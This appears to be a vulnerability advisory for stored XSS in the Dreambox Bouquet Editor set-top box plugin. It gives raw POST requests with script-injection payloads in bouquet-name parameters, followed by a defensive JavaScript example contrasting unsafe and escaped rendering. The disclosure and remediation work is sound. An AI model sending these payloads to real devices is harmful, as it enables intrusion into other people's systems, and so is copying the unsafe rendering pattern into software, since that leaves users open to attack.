Dreambox Bouquet Editor – Multiple XSS

Dreambox Bouquet Editor is a third-party plugin for Enigma2 set-top box software that makes it easier to manage bouquets. (Shodan search)

#1 /bouqueteditor/web/getservices newName Parameter Stored XSS (CVE-2013-78005)

Visit http://10.0.1.1/bouqueteditor/ and rename a bouquet with a standard XSS string. The next time /bouqueteditor/web/getservices reloads, the payload fires.

POST /bouqueteditor/web/renameservice?sRef=1:7:1:0:0:0:0:0:0:0:FROM%20BOUQUET%20%22userbouquet.___script_alert__df____script___tv_.tv%22%20ORDER%20BY%20bouquet&mode=0&newName=%22%3E%3Cscript%3Ealert('findme')%3C%2Fscript%3E HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 10.0.1.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.1/bouqueteditor/
Cookie: %7B%22updateCurrentInterval%22%3A120000%7D; %7B%22updateCurrentInterval%22%3A120000%2C%22updateBouquetInterval%22%3A300000%7D
Proxy-Connection: Keep-Alive
Content-Length: 0
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache,no-store
Expires: -1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

#2 /bouqueteditor/web/addbouquet name Parameter Stored XSS (CVE-2013-78005)

Add a new bouquet and use your regular XSS string. As soon as it is added, the page will refresh and trigger the code:

[Image: dreambox-xss01]

POST /bouqueteditor/web/addbouquet?name=%22%3E%3Cscript%3Ealert('DF')%3C/script%3E&mode=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 10.0.1.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.1/bouqueteditor/
Cookie: %7B%22updateCurrentInterval%22%3A120000%7D; %7B%22updateCurrentInterval%22%3A120000%2C%22updateBouquetInterval%22%3A300000%7D
Proxy-Connection: Keep-Alive
Content-Length: 0
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache,no-store
Expires: -1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

[Image: dreambox-xss02]
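Both findings come down to a bouquet name being stored as submitted and later written into the page without encoding. The following is an added example, not code from the plugin or from the original post: it decodes the name parameter from request targets modelled on the two above, applies an input check, and encodes the name at output time. All function names, the allow-list policy and the <li title="..."> markup are assumptions for illustration (the leading "> in both strings suggests the name lands inside a quoted attribute).

```javascript
// Added example, not the plugin's code; every function name is hypothetical.
// Constructed request targets modelled on the two requests shown above,
// plus one benign name for comparison.
const targets = [
  "/bouqueteditor/web/renameservice?mode=0&newName=%22%3E%3Cscript%3Ealert('findme')%3C%2Fscript%3E",
  "/bouqueteditor/web/addbouquet?name=%22%3E%3Cscript%3Ealert('DF')%3C/script%3E&mode=0",
  "/bouqueteditor/web/addbouquet?name=Favourites%20(TV)&mode=0",
];

// The name as a handler sees it after URL decoding.
function submittedName(target) {
  const q = new URL(target, "http://10.0.1.1").searchParams;
  return q.get("newName") ?? q.get("name") ?? "";
}

// Input check (assumed policy): letters, digits, space and . _ ( ) + -, 1 to 64 chars.
function isAcceptableName(name) {
  return /^[\p{L}\p{N} ._()+-]{1,64}$/u.test(name);
}

// Output encoding for HTML text and quoted attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: the stored name is concatenated into markup unchanged,
// so a leading "> closes the attribute and the tag.
function renderRowUnsafe(name) {
  return '<li title="' + name + '">' + name + "</li>";
}

// Hardened pattern: encode at every point where the name enters markup.
function renderRowSafe(name) {
  const n = escapeHtml(name);
  return '<li title="' + n + '">' + n + "</li>";
}

// Run both layers over the sample targets.
function review() {
  return targets.map((t) => {
    const name = submittedName(t);
    return { name, accepted: isAcceptableName(name), html: renderRowSafe(name) };
  });
}

console.log(review());
```

The input check alone is not the fix: names already stored before it was introduced are only neutralised by the encoding in renderRowSafe.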
